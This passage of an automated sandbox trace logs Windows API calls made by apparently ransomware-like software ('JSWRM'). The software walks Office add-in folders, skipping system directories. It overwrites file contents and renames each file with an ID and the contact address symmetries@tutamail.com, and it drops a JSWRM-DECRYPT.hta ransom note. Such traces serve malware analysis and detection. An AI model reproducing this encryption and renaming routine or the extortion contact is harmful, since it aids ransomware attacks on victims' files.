ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1de43d5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1de43d5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4910, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.618] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0125.618] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0125.618] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0125.618] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0125.618] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0125.618] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0125.618] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0125.618] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.618] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0125.618] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0125.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0125.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0125.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0125.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d728, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.618] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16140cde, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16140cde, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16166f59, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f05e, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.tr.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0125.618] lstrcmpiW (lpString1="PowerViewRes.tr.xap", lpString2=".") returned 1 [0125.619] lstrcmpiW (lpString1="PowerViewRes.tr.xap", lpString2="..") returned 1 [0125.619] lstrcmpiW (lpString1="PowerViewRes.tr.xap", lpString2="...") returned 1 [0125.619] lstrcmpiW (lpString1="PowerViewRes.tr.xap", lpString2="windows") returned -1 [0125.619] lstrcmpiW (lpString1="PowerViewRes.tr.xap", lpString2="recovery") returned -1 [0125.619] lstrcmpiW (lpString1="PowerViewRes.tr.xap", lpString2="perflogs") returned 1 [0125.619] lstrcmpiW (lpString1="PowerViewRes.tr.xap", lpString2="documents and settings") returned 1 [0125.619] lstrcmpiW (lpString1="PowerViewRes.tr.xap", lpString2="$RECYCLE.BIN") returned 1 [0125.619] lstrcmpiW (lpString1="PowerViewRes.tr.xap", lpString2="system volume information") returned -1 [0125.619] lstrcmpiW (lpString1="PowerViewRes.tr.xap", lpString2="msocache") returned 1 [0125.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.tr.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0125.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.tr.xap", cchWideChar=19, lpMultiByteStr=0x241100, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.tr.xap", lpUsedDefaultChar=0x0) returned 19 [0125.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.tr.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0125.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.tr.xap", cchWideChar=19, lpMultiByteStr=0x240f70, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.tr.xap", lpUsedDefaultChar=0x0) returned 19 [0125.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0125.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\tr\\PowerViewRes.tr.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\tr\\powerviewres.tr.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.620] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=323678) returned 1 [0125.620] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0125.621] ReadFile (in: hFile=0x338, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0125.634] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.634] WriteFile (in: hFile=0x338, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0125.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.635] CloseHandle (hObject=0x338) returned 1 [0125.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0125.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0125.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0125.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0125.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0125.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0125.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.635] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\tr\\PowerViewRes.tr.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\tr\\powerviewres.tr.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\tr\\PowerViewRes.tr.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\tr\\powerviewres.tr.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0125.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0125.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0125.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0125.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0125.636] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16140cde, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16140cde, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16166f59, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f05e, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.tr.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0125.636] FindClose (in: hFindFile=0x231c80 | out: hFindFile=0x231c80) returned 1 [0125.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0125.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0125.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0125.636] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7b9ee02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x161d962a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x161d962a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="uk", cAlternateFileName="")) returned 1 [0125.637] lstrcmpiW (lpString1="uk", lpString2=".") returned 1 [0125.637] lstrcmpiW (lpString1="uk", lpString2="..") returned 1 [0125.637] lstrcmpiW (lpString1="uk", lpString2="...") returned 1 [0125.637] lstrcmpiW (lpString1="uk", lpString2="windows") returned -1 [0125.637] lstrcmpiW (lpString1="uk", lpString2="recovery") returned 1 [0125.637] lstrcmpiW (lpString1="uk", lpString2="perflogs") returned 1 [0125.637] lstrcmpiW (lpString1="uk", lpString2="documents and settings") returned 1 [0125.637] lstrcmpiW (lpString1="uk", lpString2="$RECYCLE.BIN") returned 1 [0125.637] lstrcmpiW (lpString1="uk", lpString2="system volume information") returned 1 [0125.637] lstrcmpiW (lpString1="uk", lpString2="msocache") returned 1 [0125.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0125.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0125.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0125.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0125.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0125.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0125.637] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\uk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\uk\\jswrm-decrypt.hta")) returned 0xffffffff [0125.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0125.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0125.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x2501e8 [0125.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0125.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x251fb8 [0125.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0125.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0125.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0125.638] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\uk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\uk\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.639] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.639] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.640] CloseHandle (hObject=0x314) returned 1 [0125.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0125.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x251fb8 | out: hHeap=0x1e0000) returned 1 [0125.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0125.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0125.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0125.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0125.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0125.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0125.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0125.642] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\uk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\uk\\jswrm-decrypt.hta")) returned 0x20 [0125.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0125.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0125.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0125.642] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\uk\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7b9ee02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x161d962a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x418b0926, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232180 [0125.642] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.642] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7b9ee02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x161d962a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x418b0926, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0125.642] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.642] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.642] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x48cfa7d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x48cfa7d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16546d20, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4c40, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0125.642] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0125.642] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0125.642] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0125.642] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0125.642] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0125.642] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0125.642] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0125.642] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.642] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0125.642] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0125.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0125.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2411f0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0125.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0125.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0125.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0125.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0125.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0125.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0125.643] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x418b0926, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x418b0926, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x418d6df5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.643] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.643] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.643] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0125.643] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.643] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.643] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.643] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.643] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.643] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.643] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0125.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0125.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0125.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 